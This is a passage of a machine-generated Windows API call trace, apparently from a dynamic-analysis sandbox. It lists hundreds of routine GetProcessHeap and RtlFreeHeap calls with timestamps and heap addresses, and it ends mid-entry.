[0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d39eb0) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bdf0) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d39cb0) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d39c70) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948a4e0) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948bda0) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948a270) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65c50) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2cf50) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2dd10) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.525] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2cb90) returned 1 [0306.525] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d39450) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9374d30) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375ab0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93754b0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d397d0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d39790) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93751b0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d662b0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9488ef0) returned 1 [0306.526] GetProcessHeap () returned 0x21ed8c70000 [0306.526] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477da0) returned 1 [0306.529] GetProcessHeap () returned 0x21ed8c70000 [0306.529] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9371d20) returned 1 [0306.529] GetProcessHeap () returned 0x21ed8c70000 [0306.529] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65650) returned 1 [0306.529] GetProcessHeap () returned 0x21ed8c70000 [0306.529] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6bfe0) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379780) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95c40) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a50) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc89d0) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477be0) returned 1 [0306.530] GetProcessHeap () returned 0x21ed8c70000 [0306.530] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477ba0) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477900) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8710) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477740) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9477700) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9371360) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9467710) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.531] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9370250) returned 1 [0306.531] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d654d0) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2da90) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d950) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d6d0) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d672b0) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93762f0) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93759f0) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375930) returned 1 [0306.532] GetProcessHeap () returned 0x21ed8c70000 [0306.532] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d372e0) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d372a0) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93769b0) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65cb0) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93710f0) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9457720) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.533] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9370c10) returned 1 [0306.533] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65dd0) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6bf40) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d447c0) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6bea0) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8890) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bd00) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9457510) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94574d0) returned 1 [0306.534] GetProcessHeap () returned 0x21ed8c70000 [0306.534] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9457230) returned 1 [0306.535] GetProcessHeap () returned 0x21ed8c70000 [0306.535] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba30) returned 1 [0306.535] GetProcessHeap () returned 0x21ed8c70000 [0306.535] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9457020) returned 1 [0306.535] GetProcessHeap () returned 0x21ed8c70000 [0306.535] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9456fe0) returned 1 [0306.535] GetProcessHeap () returned 0x21ed8c70000 [0306.535] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9373cd0) returned 1 [0306.535] GetProcessHeap () returned 0x21ed8c70000 [0306.535] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9446ff0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93737f0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65fb0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c910) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2e490) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d1d0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66f30) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375db0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93760b0) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9376170) returned 1 [0306.537] GetProcessHeap () returned 0x21ed8c70000 [0306.537] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36e00) returned 1 [0306.538] GetProcessHeap () returned 0x21ed8c70000 [0306.538] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36dc0) returned 1 [0306.538] GetProcessHeap () returned 0x21ed8c70000 [0306.538] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375f30) returned 1 [0306.538] GetProcessHeap () returned 0x21ed8c70000 [0306.538] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d657d0) returned 1 [0306.538] GetProcessHeap () returned 0x21ed8c70000 [0306.538] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93709a0) returned 1 [0306.538] GetProcessHeap () returned 0x21ed8c70000 [0306.538] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9437000) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9370e80) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d661f0) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379c90) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44e00) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93796f0) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc86d0) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bda0) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.539] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36bd0) returned 1 [0306.539] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36b90) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9436d60) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c0c0) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9436b70) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9436b30) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9370730) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9426b40) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93715d0) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65b30) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d310) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2e350) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2ce10) returned 1 [0306.540] GetProcessHeap () returned 0x21ed8c70000 [0306.540] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66eb0) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9376230) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9374c70) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375e70) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d366f0) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d366b0) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375ff0) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65d70) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9372200) returned 1 [0306.541] GetProcessHeap () returned 0x21ed8c70000 [0306.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9416b50) returned 1 [0306.543] GetProcessHeap () returned 0x21ed8c70000 [0306.543] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9373580) returned 1 [0306.543] GetProcessHeap () returned 0x21ed8c70000 [0306.543] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7300) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379930) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93790c0) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d61f40) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8690) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bb20) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d364d0) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36490) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d361f0) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.544] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bcb0) returned 1 [0306.544] GetProcessHeap () returned 0x21ed8c70000 [0306.545] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36010) returned 1 [0306.545] GetProcessHeap () returned 0x21ed8c70000 [0306.545] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35fd0) returned 1 [0306.545] GetProcessHeap () returned 0x21ed8c70000 [0306.545] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9373310) returned 1 [0306.545] GetProcessHeap () returned 0x21ed8c70000 [0306.545] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9406b60) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.546] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93730a0) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.546] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc72a0) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.546] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c7d0) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.546] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2df90) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.546] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2dbd0) returned 1 [0306.546] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67db0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375b70) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375870) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93766b0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35b30) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35af0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9374eb0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7240) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9371f90) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93f6b70) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9372e30) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc71e0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d671b0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.547] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93795d0) returned 1 [0306.547] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67d30) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8850) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8990) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35940) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35900) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35660) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8650) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d354b0) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d35470) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9373a60) returned 1 [0306.548] GetProcessHeap () returned 0x21ed8c70000 [0306.548] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93e6b80) returned 1 [0306.551] GetProcessHeap () returned 0x21ed8c70000 [0306.551] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9372950) returned 1 [0306.551] GetProcessHeap () returned 0x21ed8c70000 [0306.551] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7180) returned 1 [0306.551] GetProcessHeap () returned 0x21ed8c70000 [0306.551] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2e210) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d590) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d450) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67cb0) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375cf0) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, 